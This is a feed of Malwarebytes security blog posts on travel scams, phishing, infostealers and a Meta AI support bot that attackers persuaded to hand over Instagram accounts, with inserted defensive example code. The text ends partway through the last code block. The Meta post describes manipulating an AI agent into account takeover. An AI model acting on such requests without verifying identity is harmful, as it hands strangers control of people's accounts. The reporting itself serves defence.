Malware Bytes

Travel scams are everywhere. Here’s how to avoid them

Malware Bytes Security - 9 hours 33 min ago

Planning a holiday should be exciting, fun, and not a cybersecurity risk. But booking flights, hotels, and rental properties often means sharing sensitive personal and financial information across multiple platforms. Combined with frequent travel scams and recurring data breaches in the travel and hospitality sector, that gives criminals plenty of opportunities.

This guide covers the most common risks when making travel reservations and explains how to avoid them. Save the adventure for your destination.

Travel bookings combine high-value payments with urgency and emotional decision-making. Attackers love that for several reasons:

  • Large upfront payments make scams profitable.
  • Booking confirmations often contain valuable personal data, such as names, travel dates, contact details, and sometimes passport information.
  • Travelers are more likely to act quickly and overlook red flags.
  • Travel and hospitality companies are frequent breach targets due to complex IT environments and third-party integrations.

Recent years have seen repeated breaches involving hotel chains, booking platforms, cruise operators, and airlines, exposing everything from email addresses to passport numbers.

Common travel-related scams

Fake booking websites

Attackers create convincing clones of airline, hotel, and travel booking websites, often promoted through online ads or SEO poisoning (manipulating search engine results). Victims enter payment details, receive fake confirmations, and only discover the fraud later.

Last year we uncovered a campaign using fake Booking.com websites that tricked visitors into infecting their own devices with a Remote Access Trojan (RAT).

Phishing messages about reservation problems

Emails, texts, or messaging app notifications may claim there’s a problem with your booking and urge you to click a link, open an attachment, or call a number. The scammers often impersonate legitimate travel brands and may include real stolen data from previous breaches.

Earlier this year, we wrote about a Booking.com breach that provided scammers with a lot of useful information that could make their messages appear more convincing.

Vacation rental fraud

Scammers post fake listings or hijack legitimate ones on rental platforms. They typically encourage off-platform communication or payments to avoid built-in protections.

In 2024, one of our researchers encountered exactly this type of scam. A supposedly legitimate Airbnb listing in Amsterdam turned out to be fake, and the scammer sent an email claiming to be from TripAdvisor in an attempt to collect payment details.

“Too good to be true” deals

Deep discounts on flights or accommodation are used to lure victims into paying for offers that don’t exist.

If a deal seems unusually generous, look for the catch. Be especially cautious when advertisers claim the offer will end very soon. Creating urgency is one of the oldest tricks in the scammer playbook.


Booking.com impersonation scams

Booking.com has become an increasingly popular brand for scammers to impersonate. According to our—anonymized—Scam Guard data, we’ve recently seen:

  • Fake cashback emails promising a €435 refund that lead to phishing websites
  • In-app messages requesting an additional reservation fee
  • Emails containing PDF attachments that require a “secure viewer,” which turns out to be malware
  • WhatsApp messages claiming credit card details are missing and directing users to phishing sites
  • Text messages linking to fake Booking.com pages and demanding card verification before a deadline

The number of scams impersonating Booking.com has been growing. Since the breach disclosed in April, Scam Guard data shows a 56% increase in Booking.com-related scams compared to the previous period, with weekly volume up consistently across five straight weeks.

How to book travel safely

There are a few simple things that can dramatically reduce your risk:

  • Use secure payment methods. Credit cards offer better fraud protection than debit cards or bank transfers. Never pay anyone asking for payment in cryptocurrencies or gift cards.
  • Stick to trusted platforms. Even though these are not guaranteed to be safe, using them is better than gambling on an unknown platform.
  • Don’t click on sponsored search results. I cannot say this often enough.
  • Verify the existence of the booked accommodation through other channels.
  • Treat requests to move communication or payment to another platform as suspicious.
  • Consider urgent language, unexpected attachments, and mismatched sender domains as red flags.
  • Don’t trust any download that claims to be needed to open an attachment. These “viewers” often turn out to be malware. Keep an up-to-date, real-time anti-malware solution running to block and remove whatever does get through.

Pro tip: Malwarebytes Browser Guard will block known phishing websites and can even recognize suspicious websites that are not in our database yet.

We don’t just report on threats—we remove them

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

Categories: Malware Bytes

Meta’s AI support bot happily handed Instagram accounts to hackers

Malware Bytes Security - 11 hours 52 min ago

Customer service chatbots have one job: get the user what they’re asking for without bothering a human. Meta’s new AI support assistant took that brief a little too seriously. Over the past few months, attackers have been opening support chats, telling the bot they were locked out of Instagram accounts they didn’t own, and walking away with the keys.

Over the weekend, Meta pushed an emergency patch after Instagram accounts belonging to the Obama White House (now dormant), beauty retailer Sephora, and a senior US Space Force official were taken over and briefly defaced with pro-Iranian imagery. Security researcher and former Meta employee Jane Manchun Wong was also hit.

How the trick worked

The attack was simple. Attackers worked out where the account owner lived (there are lists of account owners’ home cities online, or they could just research the target). Then they used a VPN to match the target account’s geographic region, which avoided raising flags with Instagram’s security systems.

Then they started a normal password reset and opened the support chat. They asked the AI bot providing support to change the email address on the account, and it did exactly that, sending a one-time code straight to the attacker’s inbox.

To do this, the chatbot appears to have been wired into Meta’s account management systems with permission to make account changes, but without being taught how to verify it was talking to the real account owner. Security people have a name for that: “confused deputy.” The term has been around since the 1980s.
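As an added example (not Meta’s code, and not a description of how Meta’s assistant is built), here is a minimal support-bot tool for changing an account’s contact address in two forms: a confused-deputy version that acts on whatever account handle and address the chat text names, and a hardened version that takes the caller’s identity from the authenticated session, checks ownership, requires a recent step-up verification, and sends the confirmation code to the address already on file. The account records, session fields, 300-second step-up window and e-mail addresses are all constructed for the demo.

```python
"""Added example (not Meta's code): a support-bot tool that changes an
account's e-mail address, first as a confused deputy, then hardened so the
tool's authority comes from the authenticated session, not from chat text."""
import secrets
import time
from dataclasses import dataclass
from typing import Optional


@dataclass
class Account:
    handle: str
    owner_id: str
    email: str


@dataclass
class Session:
    principal_id: str        # identity that actually authenticated to this chat
    step_up_at: float = 0.0  # time of the last MFA / identity re-verification


class AuthorizationError(Exception):
    pass


STEP_UP_MAX_AGE = 300                 # seconds; an assumption for this example
ACCOUNTS = {}                         # handle -> Account (constructed store)
OUTBOX = []                           # (destination address, one-time code)
PENDING = {}                          # handle -> (code, requested new address)


def send_code(to: str, code: str) -> None:
    OUTBOX.append((to, code))


# Confused deputy: the bot passes through whatever the user typed.  The tool can
# change any account and has no notion of who is asking.
def change_email_confused(handle: str, new_email: str) -> str:
    acct = ACCOUNTS[handle]
    acct.email = new_email                      # change takes effect immediately...
    send_code(new_email, secrets.token_hex(3))  # ...and the code lands in the new mailbox
    return acct.email


# Hardened: the principal comes from the session (the model never supplies it),
# ownership is checked, a recent step-up is required, and the code goes to the
# address on file, so only the current owner can confirm the change.
def change_email_request(session: Session, handle: str, new_email: str,
                         now: Optional[float] = None) -> str:
    now = time.time() if now is None else now
    acct = ACCOUNTS[handle]
    if acct.owner_id != session.principal_id:
        raise AuthorizationError("session principal does not own this account")
    if now - session.step_up_at > STEP_UP_MAX_AGE:
        raise AuthorizationError("recent identity verification required for contact changes")
    code = secrets.token_hex(3)
    PENDING[handle] = (code, new_email)
    send_code(acct.email, code)
    return "confirmation sent to the address on file"


def change_email_confirm(session: Session, handle: str, code: str) -> str:
    acct = ACCOUNTS[handle]
    expected, new_email = PENDING.get(handle, ("", ""))
    if (acct.owner_id != session.principal_id or not expected
            or not secrets.compare_digest(code, expected)):
        raise AuthorizationError("invalid confirmation")
    del PENDING[handle]
    acct.email = new_email
    return acct.email


def run_demo() -> dict:
    """Replay the takeover against both tool versions with constructed data."""
    results = {}
    now = 1_700_000_000.0
    attacker = Session(principal_id="user-attacker", step_up_at=now)  # fresh MFA on their own account
    owner = Session(principal_id="user-owner", step_up_at=now - 60)

    ACCOUNTS.clear()
    OUTBOX.clear()
    PENDING.clear()
    ACCOUNTS["victim_handle"] = Account("victim_handle", "user-owner", "owner@example.org")
    results["confused"] = change_email_confused("victim_handle", "attacker@example.net")

    ACCOUNTS["victim_handle"] = Account("victim_handle", "user-owner", "owner@example.org")
    try:
        change_email_request(attacker, "victim_handle", "attacker@example.net", now)
        results["hardened_attacker"] = "allowed"
    except AuthorizationError:
        results["hardened_attacker"] = "denied"

    change_email_request(owner, "victim_handle", "new-owner@example.org", now)
    dest, code = OUTBOX[-1]
    results["code_sent_to"] = dest
    results["hardened_owner"] = change_email_confirm(owner, "victim_handle", code)
    return results


if __name__ == "__main__":
    print(run_demo())
```

The point of the hardened version is where authority comes from: the model’s tool call may name any handle, but the tool refuses unless the session’s authenticated principal owns it, and a code mailed to the new address proves nothing, so it goes to the old one. A video identity check of the kind the article says attackers deepfaked would sit in the step-up slot, which is why step-up on its own is not the whole fix; the ownership check has to be there regardless.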

In fairness to the confused bot, attackers were successful even if the enhanced security was triggered. They would apparently create video deepfakes of their targets using images that were harvested from—you guessed it—Instagram.

Meta hoisted on its own AI petard

Meta has been shedding headcount and pouring money into AI, and rolled out its AI-powered support assistant earlier this year to help handle account recovery and other support requests.

The downside is that the AI appears to have been given the ability to perform actions such as email changes and password resets without applying enough safeguards to confirm the user’s identity first.

Meta communications executive Andy Stone said on X that the issue was resolved and impacted accounts were being secured. The company has not disclosed how many accounts were affected.

What actually worked

Why would anyone want to hack an Instagram account anyway? Revenge can be a driver, but more often than not, financial gain is the goal. Hijackers have blackmailed businesses that rely on those accounts for marketing.

Attackers using this technique have also been spotted targeting “OG” accounts with short or highly desirable usernames. If you joined Instagram early and registered a memorable handle, it can be worth thousands of dollars on underground markets.

What can you do to protect yourself?

A perennial piece of advice still holds: turn on multi-factor authentication (MFA). According to veteran cybersecurity reporter Brian Krebs, the attack failed against accounts that had MFA enabled, including those using SMS codes.

That doesn’t make MFA perfect, but it adds an important layer of protection.

So the practical advice is unglamorous:

  • Open Instagram’s Settings
  • Navigate to your Meta Accounts Center
  • Turn on Two-factor authentication. An authenticator app is better than SMS, but either is better than nothing.

Do it now, because this might not yet be over. TheCyberSecGuru reports that another attack is circulating, this time using an Android emulator called BlueStacks running a modified version of Instagram to send new prompts with hidden characters designed to manipulate the AI.

Expect more snafus from “helpful” bots

This won’t be the last attack against AI chatbots. As more companies use AI to reduce customer support costs, their attack surface will grow, and they’ll make plenty of mistakes as they try to balance security and functionality.

The Meta exploit is patched, but the confused deputy concept is not. And there’s nothing quite as damaging as a confused AI with the keys to your digital life.


We found this fake-invoice campaign while scammers were still building it

Malware Bytes Security - Wed, 06/03/2026 - 2:05pm

A new batch of fake payment invoices is being staged right now, and we caught the campaign while it was still being put together. The emails impersonate PayPal, Amazon, Geek Squad, and others, and they all share one goal: to scare you into calling a phone number where a fake “support agent” is waiting.

What makes this wave unusual is that some of the templates we recovered still contained blank fields where the phone number and price should have been, while others were already complete and in circulation. We caught the campaign mid-rollout.

What’s the scam?

If you receive an email that looks like a receipt—“Your subscription renewed for $349,” “You sent a payment of $598.96”—and it tells you to call a number to cancel or dispute the charge, stop.

There is no charge. The email exists to get you on the phone with a scammer who will then try to talk you into handing over remote access to your computer, your card details, or a “refund” that somehow requires you to send them money.

This particular flavor is called a “phantom invoice” or “refund” scam, and the trick is psychological, not technical. That’s why these emails often slip past spam filters: there is no malicious attachment or link for security systems to analyze. The scam is in the phone number you’re urged to call.

If you didn’t make the purchase, there’s no need to call the number in the email to cancel it. Real companies don’t pressure customers into resolving unexpected charges through unsolicited phone numbers.

The goal is simple: create enough concern to get you to call. You see a significant charge you don’t recognize, say $499, and your first instinct is to stop it. The invoice helpfully provides a number to call “if this wasn’t you.” So you call, and now you’re talking to the scammer.

From there, the conversation usually leads to one of a few outcomes. They may ask you to install software so they can “fix” the charge, giving them access to your computer. They may ask for your card or bank details to “process the refund.” Or they may “accidentally” refund too much and ask you to send the difference back, usually by gift card or bank transfer.

The invoice is just the bait, while the phone call is the trap.

These emails are convincing, and some are already reaching inboxes. The good news is that simply receiving one doesn’t put you at risk. The scam only works if it succeeds in getting you to call the number provided. If you recognize the message as fraudulent and delete it, the attack stops there.

If you did call the number and followed instructions from a scammer, run a virus scan and check your bank accounts. Change your critical passwords, enable multi-factor authentication (MFA), and make sure your security software is up to date.

How we caught it half-built

Most scam investigations start after the damage is done. This one was different. We came across a cluster of nearly identical invoice templates that were clearly part of the same kit, and several of them were incomplete.

Where a finished scam email would show a phone number, some of these showed the literal text #TFN# instead, which is just a placeholder. (“TFN” is the scammers’ shorthand for toll-free number, the callback line they route victims to.) Others left the price as #PRICE#, the date as #DATE#, and the recipient as #EMAIL#. These are merge fields—the blanks a bulk-sending tool fills in automatically before a campaign goes out.

Finding those placeholders still in place told us that the operation was still being assembled. Some templates were still half-finished, while others were already complete and carrying live callback numbers. We’d caught the campaign mid-rollout, between being built and fully launched.

Why these invoices look believable

The scammers use familiar brands such as PayPal, Amazon, and Geek Squad. They’re companies people expect to receive receipts and renewal notices from, which lowers suspicion.

The charges are also carefully chosen. Amounts in the few-hundred-dollar range are large enough to cause concern but still seem plausible as a subscription renewal or online purchase.

Many messages add urgency, telling recipients to call quickly to dispute or cancel the charge. This pressure is designed to stop people from verifying the transaction independently.

Some invoices even combine trusted brands, such as claiming a payment was sent through PayPal to Amazon. Referencing multiple well-known companies makes the message appear more credible.

How to spot a fake invoice

The good news is that these scams share warning signs. Once you know what to look for, they get a lot easier to catch. Watch for any of these:

  • A charge you don’t remember making. If you don’t recognize the charge, verify it independently through your account or bank. If there’s no record of it, the invoice is likely a lure designed to get you to call.
  • A ticking clock. “Call within 12 hours,” “cancel before it renews,” or “act immediately” provide fake urgency designed to stop you thinking. Real billing problems can wait while you check.
  • Brands you trust, used as cover. The more familiar the logo, the less carefully people read. Scammers borrow trust they didn’t earn.
  • Odd details that don’t quite fit. A PayPal email “from” Amazon, a stray address that belongs to no one, or slightly off wording. Trust the small things that feel wrong.
  • Pressure to keep you on the phone. Once you call, a real company would never stop you from hanging up to verify, but a scammer will.

If even one of these is present, treat the whole message as suspicious.
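The merge-field tell from the previous section and the warning signs in the list above can both be turned into triage logic. The following is an added example, not Malwarebytes’ tooling, that scores an invoice-style email on unfilled placeholders, a phone number offered as the way to dispute the charge, unrelated brands combined in one receipt, a few-hundred-dollar amount, and deadline wording. The three sample emails (with a fictitious 555 number) are constructed for the demo and are not the campaign’s actual templates; the weights and threshold are assumptions.

```python
"""Added example (constructed samples, not the campaign's actual emails):
score an invoice-style email for phantom-invoice / callback-scam traits."""
import re
from dataclasses import dataclass, field

# Merge fields a bulk mailer fills in; seeing one verbatim means the template never finished.
PLACEHOLDER_RE = re.compile(r"#([A-Z]{2,12})#")
# North American number, with or without +1 and separators.
PHONE_RE = re.compile(r"(?:\+?1[\s.-]?)?\(?(\d{3})\)?[\s.-]?(\d{3})[\s.-]?(\d{4})\b")
# A number only counts as a callback lure when it follows a "call us" style prompt.
CALL_PROMPT_RE = re.compile(r"\b(?:call|dial|contact|phone)\b(.{0,80})", re.I | re.S)
AMOUNT_RE = re.compile(r"\$\s?(\d{1,3}(?:,\d{3})*(?:\.\d{2})?)")
URGENCY_RE = re.compile(
    r"\b(?:within \d+ hours?|immediately|act now|cancel now|before it renews)\b", re.I)
BRANDS = ("paypal", "amazon", "geek squad", "best buy", "norton", "mcafee")


@dataclass
class Verdict:
    label: str = ""
    score: int = 0
    reasons: list = field(default_factory=list)
    placeholders: list = field(default_factory=list)
    callback_numbers: list = field(default_factory=list)
    brands: list = field(default_factory=list)


def callback_numbers(text: str) -> list:
    """Phone numbers that appear right after a prompt to call (normalized to digits)."""
    found = []
    for prompt in CALL_PROMPT_RE.finditer(text):
        for num in PHONE_RE.finditer(prompt.group(1)):
            digits = "".join(num.groups())
            if digits not in found:
                found.append(digits)
    return found


def analyze_invoice(subject: str, body: str) -> Verdict:
    text = f"{subject}\n{body}"
    v = Verdict()
    v.placeholders = sorted(set(PLACEHOLDER_RE.findall(text)))
    if v.placeholders:
        v.score += 5
        v.reasons.append("unfilled merge fields: template still being assembled")
    v.callback_numbers = callback_numbers(text)
    if v.callback_numbers:
        v.score += 3
        v.reasons.append("phone number offered as the way to dispute the charge")
    v.brands = [b for b in BRANDS if b in text.lower()]
    if len(v.brands) >= 2:
        v.score += 2
        v.reasons.append("unrelated brands combined in one receipt")
    amounts = [float(a.replace(",", "")) for a in AMOUNT_RE.findall(text)]
    if any(100 <= a <= 1000 for a in amounts):
        v.score += 1
        v.reasons.append("charge in the alarming-but-plausible few-hundred-dollar range")
    if URGENCY_RE.search(text):
        v.score += 2
        v.reasons.append("deadline pressure")
    v.label = "phantom_invoice" if v.score >= 4 else "no_callback_lure"
    return v


# Constructed samples (fictitious 555 number; no real campaign text).
SAMPLES = {
    "complete_lure": (
        "Receipt: your subscription renewed for $349.00",
        "Your Geek Squad protection plan was renewed for $349.00 and billed via PayPal.\n"
        "If you did not authorize this, call our billing desk at +1 (804) 555-0142 "
        "within 24 hours to cancel.\nRef: GS-7731",
    ),
    "half_built_template": (
        "Payment sent: #PRICE#",
        "Hello #EMAIL#,\nYou sent #PRICE# USD to Amazon Services via PayPal on #DATE#.\n"
        "Didn't authorize this? Call #TFN# immediately to request a refund.",
    ),
    "genuine_receipt": (
        "Your Amazon.com order has shipped",
        "Order #112-4471 (2 items, total $23.99) is on its way.\n"
        "Track it from Your Orders at amazon.com.",
    ),
}


def triage_samples() -> dict:
    return {name: analyze_invoice(*mail) for name, mail in SAMPLES.items()}


if __name__ == "__main__":
    for name, verdict in triage_samples().items():
        print(name, verdict.label, verdict.score, verdict.reasons)
```

Two design choices matter. A phone number only counts when it follows a prompt to call, so order and reference numbers that happen to be ten digits long do not trigger it. And an unfilled placeholder such as #TFN# scores on its own, since a half-built template carries no callback number yet but is still part of the same kit.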

Remember the single rule that defeats this entire scam: A genuine company will never rush you onto a call to undo a payment you never made. If you’re not sure whether a charge is real, close the email and check your account the normal way: by typing the company’s website into your browser yourself, or calling the number on the back of your bank card.

Pro tip: Malwarebytes Scam Guard can help spot scams like these and guide you in what to do next, while Browser Guard will block you from accessing scam websites.

What to do if one of these lands in your inbox

If you receive a suspicious invoice like the ones described here, take a few simple precautions:

  • Don’t call the number. That’s the core of the scam. Legitimate refunds or cancellations don’t require you to call a number from an unsolicited receipt.
  • Don’t reply or click anything. Treat the message as suspicious, even if it looks legitimate.
  • Verify charges independently. If you’re concerned a charge might be real, log in directly to PayPal, your bank, or the retailer by typing the address yourself and reviewing your transaction history.
  • Report it. Forward suspected phishing emails to the impersonated company’s abuse address and, in the US, report them to the FTC at reportfraud.ftc.gov. Reporting helps disrupt scam operations.
  • If you already called, end the conversation. Don’t install any software they recommend. If you granted remote access or shared payment information, contact your bank immediately and run a trusted security scan on your device.
  • Be wary of urgency. Phrases like “within 12 hours” or “cancel now” are designed to pressure you into acting before you think. Take the time to verify the claim independently.

Scammers are increasingly shifting to tactics that software can’t easily inspect. A phone number in an email is difficult for security tools to evaluate, and the actual scam happens over a phone call instead of through a malicious link or attachment.

That’s why finding this campaign during rollout matters. Instead of seeing the damage afterward, we got a look at the preparation: unfinished templates, incomplete details, and the scam kit before it was fully deployed.

The best defense is simple: if an unexpected invoice tells you to call a number immediately, stop and verify the charge independently first.

Indicators of compromise

Domains

invoicepdfin[.]xyz

invoicepdfus[.]xyz

invoicepdfusa[.]xyz

invoicerep[.]xyz

invoicestatement[.]xyz

invoicestm[.]xyz

Callback numbers

804-392-2793

801-640-8589


Keep getting calls from questionable numbers? Meet Scam Number Check

Malware Bytes Security - Wed, 06/03/2026 - 8:16am

Have you ever gotten a phone call and had a gut feeling that those random digits looked extra suspicious? It happens to millions of people every day. While many people have trained themselves to ignore such calls, they still pose a threat across the US. In fact, scammers stole more than $21 billion from Americans last year, according to the latest IC3 report.

That’s why we created Scam Number Check.

Now, instead of risking a call with a scammer, you can look up a number and get a clear answer in seconds.

How to use Scam Number Check

We know scam calls happen every day, and they can cost victims a lot of money. So we designed Scam Number Check to be really simple to use. It’s free, private, and instant.

Here’s how:

  • Go to Malwarebytes’ Scam Number Check and enter the phone number.
  • If the number looks suspicious, you can choose whether to block or report it. Remember, reporting suspicious numbers helps protect others.

Understanding the results

Scam Number Check can provide one of three verdicts when you check a phone number. Here’s what each means and how you should proceed:

  • Do not trust this number. Multiple people have flagged this number as a scam. Don’t call back, don’t share personal info, and don’t send money if they ask.
  • This number seems safe. Based on available data, the number has not been associated with suspicious activity. We still recommend proceeding with caution.
  • We don’t have enough info. No information is available in the threat intelligence database. This doesn’t mean it’s safe, so proceed with caution.

Why it matters

Scammers like to pile on the pressure and create fake urgency so you don’t have time to think. If you don’t recognize a number, let it go to voicemail first. Then check the number with Scam Number Check to see if it’s been linked to scams or suspicious activity. This simple extra step might help you avoid sharing personal information, sending money, or falling for impersonation scams.

Scams are getting harder to spot every day. By making Malwarebytes even better at catching threats, we’re helping you stay one step ahead of scammers and cybercriminals.


Infostealers are becoming the go-to phishing payload

Malware Bytes Security - Wed, 06/03/2026 - 4:59am

Phishing has changed. Slowly but surely, cybercriminals are turning to infostealers instead.

Traditional phishing hasn’t gone away. Far from it. But many attackers are no longer focused solely on tricking victims into entering usernames and passwords on fake login pages. Instead, they are using infostealers to quietly collect passwords, cookies, browser data, and other sensitive information from infected devices.

This approach is attractive because it scales well and reduces friction. Instead of relying on a victim to type credentials into a fake site, the malware can harvest logins already saved in browsers, session tokens, autofill data, cryptocurrency wallet details, and even files that contain useful information.

This makes the attack chain less visible. A traditional phishing email often leaves obvious clues: a suspicious link, a fake login page, or a strange attachment. Infostealers are different. They can arrive through malicious online ads (malvertising), cracked software, fake browser updates, game cheats, or dubious download sites, and once installed, they work in the background, stealing whatever the victim’s device has in store.

Part of this shift could be due to the widespread adoption of multi-factor authentication (MFA). By stealing session cookies, cybercriminals can bypass MFA, so they can access accounts without needing a password or authentication code.
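As an added example, not code from the page, the following shows why a lifted session cookie works even when the victim has MFA, and one server-side mitigation: signing the session and binding it to client attributes so that a replay from a different client is rejected. The signing key, the fingerprint inputs, the TTL and the user name are constructed for the demo.

```python
"""Added example (not from the page): why a stolen session cookie sidesteps MFA,
and one server-side mitigation, binding the session to client attributes."""
import base64
import hashlib
import hmac
import json
from typing import Optional

SERVER_KEY = b"constructed-demo-key-rotate-in-production"  # assumption: per-deployment secret
SESSION_TTL = 3600  # seconds


def client_fingerprint(ip_prefix: str, user_agent: str) -> str:
    """Coarse binding material: network prefix plus UA. Weak on its own (see caveat)."""
    return hashlib.sha256(f"{ip_prefix}|{user_agent}".encode()).hexdigest()


def _sign(payload: bytes) -> str:
    return hmac.new(SERVER_KEY, payload, hashlib.sha256).hexdigest()


def issue_session(user: str, issued_at: int, fingerprint: Optional[str] = None) -> str:
    """Return the cookie value. With fingerprint=None the cookie is a pure bearer token."""
    claims = {"sub": user, "iat": issued_at, "exp": issued_at + SESSION_TTL, "fp": fingerprint}
    payload = base64.urlsafe_b64encode(json.dumps(claims, sort_keys=True).encode()).decode()
    return f"{payload}.{_sign(payload.encode())}"


def validate_session(cookie: str, now: int, fingerprint: str) -> tuple:
    """Return (user, reason). Any failure yields (None, reason) so the app can force re-auth."""
    try:
        payload, sig = cookie.rsplit(".", 1)
    except ValueError:
        return None, "malformed"
    if not hmac.compare_digest(sig, _sign(payload.encode())):
        return None, "bad signature"
    claims = json.loads(base64.urlsafe_b64decode(payload))
    if now >= claims["exp"]:
        return None, "expired"
    if claims["fp"] is not None and not hmac.compare_digest(claims["fp"], fingerprint):
        return None, "fingerprint mismatch: possible replayed cookie"
    return claims["sub"], "ok"


def replay_demo() -> dict:
    """Victim logs in (after MFA); an infostealer lifts the cookie; attacker replays it."""
    t0 = 1_700_000_000
    victim_fp = client_fingerprint("203.0.113.0/24", "Mozilla/5.0 (Windows NT 10.0) Chrome/125")
    attacker_fp = client_fingerprint("198.51.100.0/24", "Mozilla/5.0 (X11; Linux x86_64) Firefox/126")

    bearer = issue_session("alice", t0)              # unbound: whoever holds it is "alice"
    bound = issue_session("alice", t0, victim_fp)    # bound to the victim's client attributes
    return {
        "unbound_replay": validate_session(bearer, t0 + 60, attacker_fp)[0],
        "bound_legit": validate_session(bound, t0 + 60, victim_fp)[0],
        "bound_replay": validate_session(bound, t0 + 60, attacker_fp),
        "bound_expired": validate_session(bound, t0 + SESSION_TTL, victim_fp)[1],
    }


if __name__ == "__main__":
    for name, outcome in replay_demo().items():
        print(name, outcome)
```

The unbound cookie is accepted from the attacker’s client because nothing in it says who is allowed to present it; that is the whole reason a stealer bothers with cookies. Binding to IP prefix and user agent raises the bar but is not a cure: stealers commonly exfiltrate the user agent along with the cookie, and attackers use proxies in the victim’s region. Stronger options are binding the session to a key held in a TPM or secure enclave (the direction of Chrome’s Device Bound Session Credentials work), short session lifetimes with refresh, and re-authentication for sensitive actions regardless of session state.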

Another factor is the rise of the malware-as-a-service (MaaS) ecosystem. Infostealers are cheap to deploy, easy to scale, and highly profitable. Rather than building a full attack chain themselves, many criminals buy access to ready-made stealer kits, loaders, or initial access services from underground vendors. This lowers the barrier to entry and allows less-skilled attackers to run credential theft operations.

In many cases, infostealers are just the first stage of a larger criminal operation. The stolen data is collected, packaged, and sold to other criminals interested in the harvested information. These buyers may specialize in fraud, account takeover, business email compromise, or ransomware. A single infected machine can generate multiple revenue streams: credentials for one buyer, session cookies for another, and corporate access or wallet data for a third.

That division of labor is one reason infostealers have become so persistent. Operators can update their code, rotate infrastructure, and launch new campaigns with minimal effort, while affiliates handle distribution through phishing, malvertising, fake downloads, or social media lures.

How to stay safe

Because infostealers commonly arrive through malvertising, fake browser updates, and one-click downloads, it’s worth treating ads and pop-ups with healthy skepticism. My personal tip: Never click on sponsored ads. Instead, visit official websites directly and download software only from trusted sources such as official vendor sites or app stores.

Another increasingly popular technique is ClickFix, a social engineering attack that tricks users into infecting their own devices. Never run commands or scripts copied from websites, emails, or messages unless you trust the source and understand the action’s purpose. If a website tells you to execute a command or perform a technical action, check official documentation or contact support before proceeding.


Pirated software, game cheats, and cracked tools remain some of the most common delivery methods for infostealers. These downloads often come bundled with malware that installs alongside the software you intended to get. The same caution applies to many browser extensions and add-ons that promise extra features or convenience. Stick to extensions from reputable developers, check reviews and permissions carefully, and avoid installing any add-on that asks for more access than it plausibly needs.

Phishing emails are still a major threat, but many can be spotted if you slow down and verify before clicking. Even if an email looks like it comes from a trusted brand, treat unsolicited attachments and links with caution, especially when they urge you to open a file, install something urgently, or fix a billing issue. If you’re unsure, check the sender address, look for typos or odd phrasing, and confirm the request through a separate channel such as the company’s official website rather than the link in the email.


These convincing copyright notices are designed to steal Google logins

Malware Bytes Security - Tue, 06/02/2026 - 2:24pm

A new scam is targeting people who publish Chrome extensions.

The scam arrives as an official-looking “copyright removal request” claiming your extension is about to be removed from the Chrome Web Store and that you have 48 hours to appeal.

It even looks personalized. After you enter your extension’s ID to “verify” it, the page pulls in your extension’s real name and icon. But it’s all part of a phishing attack designed to steal your Google username and password.

If attackers gain access to a developer account, they may be able to take over the extension, access developer resources, or potentially push malicious updates to users.

What’s actually going on

If you’ve published a Chrome extension, you might encounter a page that looks like an official Google notice warning that your extension is being removed for copyright infringement.

The page asks you to enter your extension ID, then displays your real extension details alongside a complaint number and countdown clock. It pressures you to sign in with Google to file an appeal before time runs out.

None of it is real. The page is not operated by Google. The complaint, deadline, and countdown are fabricated. The goal is to trick you into entering your Google username and password into a fake sign-in window controlled by the scammer.

The most important rule to remember: Genuine warnings about your extension appear in your Chrome Web Store developer dashboard, not on a third-party website.

Why scammers want developer accounts

Chrome extensions have access to users’ browsers, and they can be updated automatically.

If attackers gain control of a developer account, they may be able to modify an extension, access developer resources, or potentially distribute malicious updates to existing users.

That’s what makes developer accounts such attractive targets, and why scams like these are prevalent.

What the scam looks like

The page is hosted on a domain that has nothing to do with Google. In the version we analyzed, the site used the address dmca-chrome-extensions[.]click.

Despite that, it uses Google’s branding and presents itself as a “Chrome Web Store Developer Policy Center.”

The page first asks for the link or ID of your extension. That seems harmless, which is exactly why it works.

It uses your own extension to look convincing

After you enter your extension ID, the page briefly displays a “Looking up extension…” message and then builds a fake takedown notice around your real extension.

When we tested the scam page by entering the ID of our own extension, Malwarebytes Browser Guard, it displayed our genuine extension name, icon, and Chrome Web Store listing alongside the fake complaint.

The site is simply pulling publicly available information from your extension’s Chrome Web Store page. Anyone can see that information. The scammers use it to make the fake notice appear legitimate.

Everything else is invented.

The complaint number, “date received,” 48-hour deadline, countdown timer, and timeline of events are generated by the scam page itself.

The countdown is there to rush you

A red warning banner claims your extension will be permanently removed unless you act within 48 hours, and a clock counts down by the second. The whole layout pushes you toward one button: sign in with Google to “verify your identity” and file your appeal. 

The urgency is designed to create pressure so you react before taking the time to verify the claim.

The fake sign-in window

When you click “Continue to verification,” a Google sign-in window appears with a title bar, padlock, and address showing accounts.google.com.

It looks authentic, but it isn’t.

The “window” is actually part of the web page itself. The padlock and address are just graphics designed to look like a real browser window.

The scammers even tailor the appearance to match your operating system, showing Mac-style windows on macOS and Windows-style windows on Windows devices.

Anything typed into this fake sign-in form is sent directly to the scammers.

One giveaway is that the window cannot leave the browser page. Try dragging it to the edge of your screen and it stops at the browser border. Minimize the browser and it disappears as well.

Most importantly, your browser’s real address bar still shows the scam site’s address, not Google’s.
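Analysts who capture a page like this want a quick way to confirm the tells described above. The following is an added triage script, not the scam’s code and not Malwarebytes’ tooling, that feeds a saved page through Python’s HTML parser and flags a trusted login hostname painted as text on a page whose real origin is elsewhere, a password form that posts back to the scam host, and countdown scripting. The sample HTML is constructed to mimic the technique rather than reproduce the real page’s markup, and the registrable-domain helper is a deliberate simplification.

```python
"""Added example (constructed page, not the actual scam HTML): triage a captured
phishing page for a "browser-in-the-browser" fake sign-in window."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_LOGIN_HOSTS = {"accounts.google.com", "login.microsoftonline.com",
                       "login.live.com", "appleid.apple.com"}
HOST_RE = re.compile(r"(?<![\w.-])((?:[a-z0-9-]+\.)+[a-z]{2,})(?![\w-])", re.I)
# Attributes whose value is displayed to the victim, as opposed to navigated to.
DISPLAY_ATTRS = ("value", "placeholder", "title", "alt", "aria-label")


def registrable(host: str) -> str:
    """Crude eTLD+1 (fine for this demo; use a public-suffix list in production)."""
    return ".".join(host.lower().split(".")[-2:])


class PageCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.displayed = []      # text the victim can see, plus inline script bodies
        self.form_actions = []
        self.has_password = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.form_actions.append(a.get("action") or "")
        if tag == "input" and (a.get("type") or "").lower() == "password":
            self.has_password = True
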